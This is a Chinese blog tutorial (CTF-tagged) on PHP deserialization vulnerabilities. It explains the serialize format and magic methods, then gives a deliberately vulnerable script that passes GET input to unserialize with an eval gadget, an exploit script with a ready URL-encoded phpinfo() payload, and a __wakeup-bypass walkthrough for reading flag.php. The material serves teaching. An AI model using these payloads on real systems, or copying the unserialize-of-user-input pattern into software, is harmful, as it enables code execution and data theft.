<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="utf-8">
  
  <title>php反序列化漏洞解析 | greetdawn&#39;s Blog</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta property="og:type" content="article">
<meta property="og:title" content="php反序列化漏洞解析">
<meta property="og:url" content="http://www.greetdawn.top/2019/05/14/web-security/php-code-audit/php-unserialize-vul/index.html">
<meta property="og:site_name" content="greetdawn&#39;s Blog">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://gitee.com/greetdawn/blogImages/raw/master/img/bbbb.jpg">
<meta property="og:image" content="https://gitee.com/greetdawn/blogImages/raw/master/img/20210108160207.png">
<meta property="og:image" content="https://gitee.com/greetdawn/blogImages/raw/master/img/20210112101254.png">
<meta property="og:image" content="https://gitee.com/greetdawn/blogImages/raw/master/img/20210112110501.png">
<meta property="article:published_time" content="2019-05-14T06:59:28.000Z">
<meta property="article:modified_time" content="2021-01-29T08:05:22.328Z">
<meta property="article:author" content="丨greetdawn丨">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="PHP反序列化">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://gitee.com/greetdawn/blogImages/raw/master/img/bbbb.jpg">
  
    <link rel="alternate" href="/atom.xml" title="greetdawn's Blog" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.ico">
  
  
<link rel="stylesheet" href="/css/typing.css">

  
<link rel="stylesheet" href="/css/donate.css">

  
  
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.css">

  
<meta name="generator" content="Hexo 5.4.0"></head>

  
    
      <body>
    
  
      <div id="container" class="container">
        <article id="post-web-security/php-code-audit/php-unserialize-vul" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <header id="header" class="header">
  <nav class="mobile-nav">
    <h1 class="nickname">NickName</h1>
    <ul class="mobile-nav-menu">
      <label for="mobile-menu-toggle"><a id="menu-button">&#9776; Menu</a></label>
      <input type="checkbox" id="mobile-menu-toggle"/>
      <ul class="mobile-nav-link">
        
        <a href="/">Home</a>
        
        <a href="/archives">Archives</a>
        
        <a href="/about">About</a>
        
      </ul>
    </ul>
  </nav>
	
		<nav id="main-nav" class="main-nav nav-left">
	
	
	  <a class="main-nav-link" href="/">Home</a>
	
	  <a class="main-nav-link" href="/archives">Archives</a>
	
	  <a class="main-nav-link" href="/about">About</a>
	
  </nav>
</header>

  <hr/>
  <div class="article-inner">
    

    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      php反序列化漏洞解析
    </h1>
  

      </header>
    
    <div class="e-content article-entry typo" itemprop="articleBody">
      
        <p><img src="https://gitee.com/greetdawn/blogImages/raw/master/img/bbbb.jpg" alt="bbbb"></p>
<span id="more"></span>

<h1 id="PHP反序列化漏洞"><a href="#PHP反序列化漏洞" class="headerlink" title="PHP反序列化漏洞"></a>PHP反序列化漏洞</h1><h2 id="序列化与反序列化"><a href="#序列化与反序列化" class="headerlink" title="序列化与反序列化"></a>序列化与反序列化</h2><h3 id="PHP的序列化"><a href="#PHP的序列化" class="headerlink" title="PHP的序列化"></a>PHP的序列化</h3><p>php序列化就是将各种类型的数据，压缩并按照一定的格式进行存储的过程。其本质就是将对象数据类型转换成字符串的数据类型，方便于对象的传递。</p>
<p>函数:<code>serialize()</code></p>
<p>代码实例:</p>
<pre class="language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
	<span class="token keyword">class</span> <span class="token class-name-definition class-name">SerializeDemo</span> <span class="token punctuation">&#123;</span>
		<span class="token keyword">public</span> <span class="token variable">$a</span> <span class="token operator">=</span> <span class="token string double-quoted-string">"public"</span><span class="token punctuation">;</span>
		<span class="token keyword">private</span> <span class="token variable">$b</span> <span class="token operator">=</span> <span class="token string double-quoted-string">"private"</span><span class="token punctuation">;</span>
		<span class="token keyword">protected</span> <span class="token variable">$c</span> <span class="token operator">=</span> <span class="token string double-quoted-string">"protected"</span><span class="token punctuation">;</span>
		<span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function-definition function">get_public</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
			<span class="token keyword">echo</span> <span class="token variable">$this</span><span class="token operator">-></span><span class="token property">a</span><span class="token punctuation">;</span>
		<span class="token punctuation">&#125;</span>
	<span class="token punctuation">&#125;</span>
	<span class="token variable">$data</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">SerializeDemo</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token keyword">echo</span> <span class="token function">serialize</span><span class="token punctuation">(</span><span class="token variable">$data</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token delimiter important">?></span></span></code></pre>

<p>输出结果：</p>
<p><img src="https://gitee.com/greetdawn/blogImages/raw/master/img/20210108160207.png"></p>
<p>结果分析：</p>
<blockquote>
<p>O：代表这是一个对象</p>
<p>13：代表对象名称占13个字符</p>
<p>SerializeDemo：代表对象名称</p>
<p>3：代表对象有3个属性</p>
<p>s:代表属性的类型str</p>
<p>1：代表属性名称长度为1字符</p>
<p>a：代表属性名称</p>
<p>s：代表属性值类型为str</p>
<p>6：代表属性值占6个字符</p>
<p>public：代表属性值</p>
</blockquote>
<p>注：根据结果我们可以发现这里面的三个属性的标识结果均不相同，这是为什么呢？</p>
<h3 id="PHP序列化中的权限"><a href="#PHP序列化中的权限" class="headerlink" title="PHP序列化中的权限"></a>PHP序列化中的权限</h3><p>根据上述实例我们发现，属性b在序列化之后变成了SerializeDemob,长度也与真实字符数量不一致；并且属性c也不相同，前面多了一个*。发生此种现象的原因主要是由于成员变量属性的属性不同所导致的。序列化为了能把整个类对象的各种信息完完整整的压缩、格式化，必须也要对其属性的权限进行序列化。针对于此种情况，我们具体来看一下public、private、protected三种属性的具体表现情况：</p>
<ul>
<li>public</li>
</ul>
<blockquote>
<p>该权限序列化时，该是几个字符就是几个字符</p>
</blockquote>
<ul>
<li>private</li>
</ul>
<blockquote>
<p>该权限是私有属性，私有权限的特征是该类对其私有属性具有强烈占有欲，所以会在其私有属性前增加自己的类名;多出来的两个字符为空白符，也就是%00，最终的表现形式为：%00类名%00属性名</p>
</blockquote>
<ul>
<li>protected</li>
</ul>
<blockquote>
<p>该属性为受保护权限，序列化时的变现形式为：%00*%00属性名</p>
</blockquote>
<h3 id="PHP序列化的内容"><a href="#PHP序列化的内容" class="headerlink" title="PHP序列化的内容"></a>PHP序列化的内容</h3><p>根据前面序列化的实例我们发现，整个序列化的过程中，只会对其类的属性内容进行序列化保存，不会对其方法进行序列化。</p>
<ol>
<li>在反序列化的时候一定要保证在当前的作用域环境下有该类存在;</li>
</ol>
<p>反序列化就是将我们压缩格式化的对象还原成初始状态的过程（可以认为是解压缩的过程），因为我们没有序列化方法，因此在反序列化以后我们如果想正常使用这个对象的话我们必须要依托于这个类要在当前作用域存在的条件。</p>
<ol start="2">
<li>在反序列化攻击的时候也就是依托类属性进行攻击;</li>
</ol>
<p>因为没有序列化方法，能控制的只有类的属性，因此类属性就是唯一的攻击入口。在的攻击流程中，就是要寻找合适的能被我们控制的属性，然后利用它本身的存在的方法，在基于属性被控制的情况下发动我们的反序列化攻击。</p>
<h3 id="PHP的反序列化"><a href="#PHP的反序列化" class="headerlink" title="PHP的反序列化"></a>PHP的反序列化</h3><p>反序列化就是将原本序列化之后的字符串格式还原成的初始对象的过程；使对象数据长久保存，可以在随时想调用的时候就可以调用。</p>
<p>函数:<code>unserialize()</code></p>
<p>代码实例:</p>
<pre class="language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
	<span class="token keyword">class</span> <span class="token class-name-definition class-name">SerializeDemo</span> <span class="token punctuation">&#123;</span>
		<span class="token keyword">public</span> <span class="token variable">$a</span> <span class="token operator">=</span> <span class="token string double-quoted-string">"public"</span><span class="token punctuation">;</span>
		<span class="token keyword">private</span> <span class="token variable">$b</span> <span class="token operator">=</span> <span class="token string double-quoted-string">"private"</span><span class="token punctuation">;</span>
		<span class="token keyword">protected</span> <span class="token variable">$c</span> <span class="token operator">=</span> <span class="token string double-quoted-string">"protected"</span><span class="token punctuation">;</span>
		<span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function-definition function">get_public</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
			<span class="token keyword">echo</span> <span class="token variable">$this</span><span class="token operator">-></span><span class="token property">a</span><span class="token punctuation">;</span>
		<span class="token punctuation">&#125;</span>
	<span class="token punctuation">&#125;</span>
	<span class="token variable">$data</span> <span class="token operator">=</span> <span class="token function">file_get_contents</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"serialize.txt"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token variable">$data</span> <span class="token operator">=</span> <span class="token function">unserialize</span><span class="token punctuation">(</span><span class="token variable">$data</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token variable">$data</span><span class="token operator">-></span><span class="token function">get_public</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token delimiter important">?></span></span></code></pre>

<p>serialize.txt</p>
<pre class="language-php" data-language="php"><code class="language-php"><span class="token constant">O</span><span class="token punctuation">:</span><span class="token number">13</span><span class="token punctuation">:</span><span class="token string double-quoted-string">"SerializeDemo"</span><span class="token punctuation">:</span><span class="token number">3</span><span class="token punctuation">:</span><span class="token punctuation">&#123;</span>s<span class="token punctuation">:</span><span class="token number">1</span><span class="token punctuation">:</span><span class="token string double-quoted-string">"a"</span><span class="token punctuation">;</span>s<span class="token punctuation">:</span><span class="token number">6</span><span class="token punctuation">:</span><span class="token string double-quoted-string">"public"</span><span class="token punctuation">;</span>s<span class="token punctuation">:</span><span class="token number">16</span><span class="token punctuation">:</span><span class="token string double-quoted-string">"%00Serialize%00Demob"</span><span class="token punctuation">;</span>s<span class="token punctuation">:</span><span class="token number">7</span><span class="token punctuation">:</span><span class="token string double-quoted-string">"private"</span><span class="token punctuation">;</span>s<span class="token punctuation">:</span><span class="token number">4</span><span class="token punctuation">:</span><span class="token string double-quoted-string">"%00*%00c"</span><span class="token punctuation">;</span>s<span class="token punctuation">:</span><span class="token number">9</span><span class="token punctuation">:</span><span class="token string double-quoted-string">"protected"</span><span class="token punctuation">;</span><span class="token punctuation">&#125;</span></code></pre>

<p>结果输出</p>
<p><img src="https://gitee.com/greetdawn/blogImages/raw/master/img/20210112101254.png"></p>
<h3 id="反序列化漏洞概念"><a href="#反序列化漏洞概念" class="headerlink" title="反序列化漏洞概念"></a>反序列化漏洞概念</h3><p>PHP 反序列化漏洞又叫做 PHP 对象注入漏洞。</p>
<p>反序列化漏洞的成因在于代码中的 unserialize() 接收的参数可控，从上面的例子看，这个函数的参数是一个序列化的对象，而序列化的对象只含有对象的属性，那我们就要利用对对象属性的篡改实现最终的攻击。</p>
<h2 id="魔法函数"><a href="#魔法函数" class="headerlink" title="魔法函数"></a>魔法函数</h2><h3 id="常见的魔法函数"><a href="#常见的魔法函数" class="headerlink" title="常见的魔法函数"></a>常见的魔法函数</h3><ul>
<li>__construct()</li>
</ul>
<p>当对象创建时会自动调用(但在unserialize()时是不会自动调用的)。</p>
<ul>
<li>__destruct()</li>
</ul>
<p>当对象被销毁时会自动调用。</p>
<ul>
<li>__toString()</li>
</ul>
<p>当反序列化后的对象被输出在模板中的时候（转换成字符串的时候）自动调用。</p>
<blockquote>
<p>(1)echo (<code>$obj</code>) / print(<code>$obj</code>) 打印时会触发</p>
<p>(2)反序列化对象与字符串连接时</p>
<p>(3)反序列化对象参与格式化字符串时</p>
<p>(4)反序列化对象与字符串进行==比较时（PHP进行==比较的时候会转换参数类型）</p>
<p>(5)反序列化对象参与格式化SQL语句，绑定参数时</p>
<p>(6)反序列化对象在经过php字符串函数，如 strlen()、addslashes()时</p>
<p>(7)在in_array()方法中，第一个参数是反序列化对象，第二个参数的数组中有toString返回的字符串的时候toString会被调用</p>
<p>(8)反序列化的对象作为 class_exists() 的参数的时候</p>
</blockquote>
<ul>
<li>__wakeup()</li>
</ul>
<p>当一个对象被反序列时会被自动调用。</p>
<ul>
<li>__sleep()</li>
</ul>
<p>对象被序列化之前触发，返回需要被序列化存储的成员属性，删除不必要的属性。</p>
<ul>
<li>__invoke()</li>
</ul>
<p>当一个实例化对象被当成一个方法调用时会自动触发此方法。</p>
<ul>
<li>__call()</li>
</ul>
<p>在一个对象中，当一个调用的方法不能访问时，会自动触发。</p>
<ul>
<li>2.2.8 __get()</li>
</ul>
<p>当调用一个不可访问的属性时会自动调用。</p>
<h3 id="利用魔法函数的攻击实例-magic-function"><a href="#利用魔法函数的攻击实例-magic-function" class="headerlink" title="利用魔法函数的攻击实例(magic_function)"></a>利用魔法函数的攻击实例(magic_function)</h3><p>案例代码</p>
<pre class="language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
    <span class="token keyword">class</span> <span class="token class-name-definition class-name">Greetdawn</span> <span class="token punctuation">&#123;</span>
        <span class="token keyword">private</span> <span class="token variable">$test</span><span class="token punctuation">;</span>
        <span class="token keyword">public</span> <span class="token variable">$Greetdawn</span> <span class="token operator">=</span> <span class="token string double-quoted-string">"i am Greetdawn"</span><span class="token punctuation">;</span>
        <span class="token keyword">function</span> <span class="token function-definition function">__construct</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
            <span class="token variable">$this</span><span class="token operator">-></span><span class="token property">test</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">L</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token punctuation">&#125;</span>
        <span class="token keyword">function</span> <span class="token function-definition function">__destruct</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
            <span class="token variable">$this</span><span class="token operator">-></span><span class="token property">test</span><span class="token operator">-></span><span class="token function">action</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token punctuation">&#125;</span>
    <span class="token punctuation">&#125;</span>
    <span class="token keyword">class</span> <span class="token class-name-definition class-name">L</span> <span class="token punctuation">&#123;</span>
        <span class="token keyword">function</span> <span class="token function-definition function">action</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
            <span class="token keyword">echo</span> <span class="token string double-quoted-string">"Welcome to Sec World"</span><span class="token punctuation">;</span>
        <span class="token punctuation">&#125;</span>
    <span class="token punctuation">&#125;</span>
    <span class="token keyword">class</span> <span class="token class-name-definition class-name">Evil</span> <span class="token punctuation">&#123;</span>
        <span class="token keyword">var</span> <span class="token variable">$test2</span><span class="token punctuation">;</span>
        <span class="token keyword">function</span> <span class="token function-definition function">action</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
            <span class="token keyword">eval</span><span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-></span><span class="token property">test2</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token punctuation">&#125;</span>
    <span class="token punctuation">&#125;</span>
    <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token keyword">isset</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'test'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
        <span class="token function">unserialize</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'test'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span> <span class="token keyword">else</span> <span class="token punctuation">&#123;</span>
        <span class="token variable">$obj</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">Greetdawn</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token function">highlight_file</span><span class="token punctuation">(</span><span class="token constant">__FILE__</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>
<span class="token delimiter important">?></span></span></code></pre>

<p>代码分析</p>
<p>首先发现有三个类，主类为<code>Greetdawn</code>，且该类中有<code>__construct()、__destruct()</code>两个魔法函数；</p>
<p>实例化<code>Greetdawn</code>类的时候，会先触发<code>__construct()</code>方法，实例化一个L类并赋值给变量<code>test</code>；</p>
<p><code>L</code>类中含有<code>action</code>方法且输出一句话；</p>
<p>我们发现在L类下方还存在一个<code>Evil</code>的类也同样存在一个<code>action</code>方法，但是该方法中是调用一个<code>eval</code>的危险函数；</p>
<p>那这边强制将<code>__construct()</code>方法中实例化的类改为<code>Evil</code>类即可达成利用；</p>
<p>exp</p>
<pre class="language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
    <span class="token keyword">class</span> <span class="token class-name-definition class-name">Greetdawn</span> <span class="token punctuation">&#123;</span>
        <span class="token keyword">private</span> <span class="token variable">$test</span><span class="token punctuation">;</span>
        <span class="token keyword">function</span> <span class="token function-definition function">__construct</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
            <span class="token variable">$this</span><span class="token operator">-></span><span class="token property">test</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">Evil</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token punctuation">&#125;</span>
    <span class="token punctuation">&#125;</span>
    <span class="token keyword">class</span> <span class="token class-name-definition class-name">Evil</span> <span class="token punctuation">&#123;</span>
        <span class="token keyword">var</span> <span class="token variable">$test2</span> <span class="token operator">=</span> <span class="token string double-quoted-string">"phpinfo();"</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>
    <span class="token variable">$data</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">Greetdawn</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">echo</span> <span class="token function">urlencode</span><span class="token punctuation">(</span><span class="token function">serialize</span><span class="token punctuation">(</span><span class="token variable">$data</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token delimiter important">?></span></span>
O%3A9%3A%22Greetdawn%22%3A1%3A%7Bs%3A15%3A%22%00Greetdawn%00test%22%3BO%3A4%3A%22Evil%22%3A1%3A%7Bs%3A5%3A%22test2%22%3Bs%3A10%3A%22phpinfo%28%29%3B%22%3B%7D%7D</code></pre>

<p><img src="https://gitee.com/greetdawn/blogImages/raw/master/img/20210112110501.png"></p>
<h3 id="反序列化攻击流程"><a href="#反序列化攻击流程" class="headerlink" title="反序列化攻击流程"></a>反序列化攻击流程</h3><p>(1)寻找unserialize()函数的参数是否有我们的可控点<br>(2)寻找我们的反序列化的目标，重点寻找 存在 wakeup() 或 destruct() 魔法函数的类<br>(3)一层一层地研究该类在魔法方法中使用的属性和属性调用的方法，看看是否有可控的属性能实现在当前调用的过程中触发的<br>(4)找到我们要控制的属性了以后我们就将要用到的代码部分复制下来，然后构造序列化，发起攻击</p>
<h2 id="wakeup函数绕过"><a href="#wakeup函数绕过" class="headerlink" title="__wakeup函数绕过"></a>__wakeup函数绕过</h2><h3 id="漏洞源码"><a href="#漏洞源码" class="headerlink" title="漏洞源码"></a>漏洞源码</h3><pre class="language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token keyword">class</span> <span class="token class-name-definition class-name">SoFun</span><span class="token punctuation">&#123;</span>
    <span class="token keyword">protected</span> <span class="token variable">$file</span><span class="token operator">=</span><span class="token string single-quoted-string">'index.php'</span><span class="token punctuation">;</span>
    <span class="token keyword">function</span> <span class="token function-definition function">__destruct</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
        <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token operator">!</span><span class="token keyword">empty</span><span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-></span><span class="token property">file</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
            <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token function">strchr</span><span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-></span> <span class="token property">file</span><span class="token punctuation">,</span><span class="token string double-quoted-string">"\\"</span><span class="token punctuation">)</span><span class="token operator">===</span><span class="token constant boolean">false</span> <span class="token operator">&amp;&amp;</span>  <span class="token function">strchr</span><span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-></span><span class="token property">file</span><span class="token punctuation">,</span> <span class="token string single-quoted-string">'/'</span><span class="token punctuation">)</span><span class="token operator">===</span><span class="token constant boolean">false</span><span class="token punctuation">)</span>
                <span class="token function">show_source</span><span class="token punctuation">(</span><span class="token function">dirname</span> <span class="token punctuation">(</span><span class="token constant">__FILE__</span><span class="token punctuation">)</span><span class="token operator">.</span><span class="token string single-quoted-string">'/'</span><span class="token operator">.</span><span class="token variable">$this</span> <span class="token operator">-></span><span class="token property">file</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
            <span class="token keyword">else</span>
                <span class="token keyword">die</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'Wrong filename.'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token punctuation">&#125;</span>
    <span class="token punctuation">&#125;</span>
    <span class="token keyword">function</span> <span class="token function-definition function">__wakeup</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
        <span class="token variable">$this</span><span class="token operator">-></span> <span class="token property">file</span><span class="token operator">=</span><span class="token string single-quoted-string">'index.php'</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>
    <span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function-definition function">__toString</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
        <span class="token keyword">return</span> <span class="token string single-quoted-string">''</span> <span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span><span class="token keyword">isset</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'file'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
    <span class="token function">show_source</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'index.php'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>
<span class="token keyword">else</span><span class="token punctuation">&#123;</span>
    <span class="token variable">$file</span><span class="token operator">=</span><span class="token function">base64_decode</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'file'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">echo</span> <span class="token function">unserialize</span><span class="token punctuation">(</span><span class="token variable">$file</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>
<span class="token delimiter important">?></span></span> #<span class="token comment">&lt;!--key in flag.php--></span></code></pre>



<h3 id="审计思路"><a href="#审计思路" class="headerlink" title="审计思路"></a>审计思路</h3><ul>
<li>源码最后提示，<code>KEY</code>在<code>flag.php</code>里面； </li>
<li>注意到<code>__destruct</code>魔术方法中，有这么一段代码，将<code>file</code>文件内容显示出来 <code>show_source(dirname(FILE).’/‘.$this-&gt;file)</code>，这个是解题关键；</li>
<li>若<code>POST“file”</code>参数为序列化对象，且将<code>file</code>设为<code>flag.php</code>；那么可以通过<code>unserialize</code>反序列化，进而调用<code>destruct</code>魔术方法来显示<code>flag.php</code>源码（要注意的是file参数内容需要经过base64编码）； </li>
<li>但是通过<code>unserialize</code>反序列化之后，也会调用<code>__wakeup方法</code>，它会把file设为<code>index.php</code>;</li>
<li>总结下来就是，想办法把file设为flag.php，调用<code>__destruct</code>方法，且绕过<code>__wakeup</code>。</li>
</ul>
<h3 id="wakeup绕过特性"><a href="#wakeup绕过特性" class="headerlink" title="__wakeup绕过特性"></a>__wakeup绕过特性</h3><p>绕过wakeup的限制：当序列化字符串中，表示对象属性个数的值大于实际属性个数时，那么就会跳过wakeup方法的执行。</p>
<p>php版本限制：PHP5 &lt; 5.6.25 | PHP7 &lt; 7.0.10</p>
<p>file是protected属性，因此需要用\00*\00来表示，\00代表ascii为0的值payload</p>
<h3 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h3><p>因php版本原因未复现可以简单的使用phpstudy来复现比较快捷；</p>
<pre class="language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
    <span class="token keyword">class</span> <span class="token class-name-definition class-name">SoFun</span><span class="token punctuation">&#123;</span>
        <span class="token keyword">protected</span> <span class="token variable">$file</span> <span class="token operator">=</span> <span class="token string single-quoted-string">'flag.php'</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>

    <span class="token variable">$object</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">SoFun</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token variable">$data</span> <span class="token operator">=</span> <span class="token function">serialize</span><span class="token punctuation">(</span><span class="token variable">$object</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">echo</span> <span class="token variable">$data</span><span class="token punctuation">;</span>
    <span class="token keyword">echo</span> <span class="token function">base64_encode</span><span class="token punctuation">(</span><span class="token variable">$data</span><span class="token punctuation">)</span><span class="token punctuation">;</span></span></code></pre>


      
      
    </div>
    <footer class="article-footer">
      <ul class="article-meta">
        <li>
          <span class="label">Published Date:</span>
          <a href="/2019/05/14/web-security/php-code-audit/php-unserialize-vul/" class="article-date">
  <time class="dt-published" datetime="2019-05-14T06:59:28.000Z" itemprop="datePublished">2019-05-14</time>
</a>

        </li>
        
          <li>
            <span class="label">Category:</span>
            
  <div class="article-category">
    <a class="article-category-link" href="/categories/PHP%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">PHP代码审计</a>
  </div>


          </li>
        
        
          <li>
            <span class="label">Tag:</span>
            
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/CTF/" rel="tag">CTF</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" rel="tag">PHP反序列化</a></li></ul>


          </li>
        
        <hr/>
      </ul>
    </footer>
  </div>
  
    
<nav id="article-nav" class="article-nav">
  
    <a href="/2019/05/16/web-security/php-code-audit/php-unserialzie-session/" id="article-nav-newer" class="article-nav-link-wrap newer">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          session反序列化
        
      </div>
    </a>
  
  
    <a href="/2019/03/10/web-security/php-code-audit/php-features/" id="article-nav-older" class="article-nav-link-wrap older">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">php语言特性类型讲解</div>
    </a>
  
</nav>


  
</article>










      </div>
      
    <footer id="footer" class="post-footer footer">
      
      <hr/>
      <div id="footerContent" class="footer-content">
        <p>ipsum dolor sit amet, <strong>consectetur adipiscing elit.</strong> Fusce eget urna vitae velit <em>eleifend interdum at ac nisi. In nec ligula lacus. Cum sociis natoque</em> penatibus et magnis dis parturient montes, nascetur ridiculus mus. Sed eu cursus erat, ut dapibus quam. Post</p>


      </div>
    </footer>

      








<script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script>


<script src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js"></script>



  
<script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.js"></script>




<script src="/js/typing.js"></script>

<!--[if lt IE 9]>
<script src="https://cdn.jsdelivr.net/npm/html5shiv@3/dist/html5shiv.min.js"></script>
<![endif]-->







    </div>
  </body>
</html>
